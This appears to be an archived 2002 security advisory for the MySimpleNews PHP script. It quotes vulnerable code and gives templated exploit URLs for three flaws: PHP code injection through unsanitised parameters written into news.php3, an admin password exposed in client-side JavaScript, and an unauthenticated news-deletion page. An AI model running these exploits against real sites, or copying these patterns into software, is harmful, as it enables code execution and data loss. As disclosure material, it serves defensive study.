MySimpleNews (PHP)

2002-10-03T00:00:00
ID SECURITYVULNS:DOC:3572
Type securityvulns
Reporter Securityvulns
Modified 2002-10-03T00:00:00

Description

Informations : °°°°°°°°°°°°°° Language : PHP Tested version : 1 Website : ? Comment : Very simple code.

a) Writing PHP code in a PHP file and execution of this code. Problem : °°°°°°°°° ----------------- users.php ----------------- <? $fp=fopen("news.php3","a"); fwrite($fp,"Post&#233; Par [$LOGIN]\n"); fwrite($fp,"Le $DATA\n<br>"); fwrite($fp,"$MESS\n<hr>"); fclose($fp); ?> ----------------- users.php -----------------

Exploit : °°°°°°°°° http://[target]/users.php?LOGIN=[PHP code] or http://[target]/users.php?DATA=[PHP code] or http://[target]/users.php?MESS=[PHP code] Execution : http://[target]/news.php3

b) Recovery of admin's password. Problem : °°°°°°°°° ------------------ admin.html ------------------ moncode = prompt('MySimpleNews - Administration',''); if (moncode != "[PASSWORD]") { location.href="about:Erreur 403"; } ------------------ admin.html ------------------

Exploit : °°°°°°°°° view-source:http://[target]/admin.html

c) Deleting news. Problem : °°°°°°°°° No security in the file.

Exploit : °°°°°°°°° http://[target]/vider.php3

Patch : °°°°°°° Use of htaccess.

More details in french : http://www.frog-man.org/tutos/MySimpleNews.txt

Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n


Discutez en ligne avec vos amis ! http://messenger.msn.fr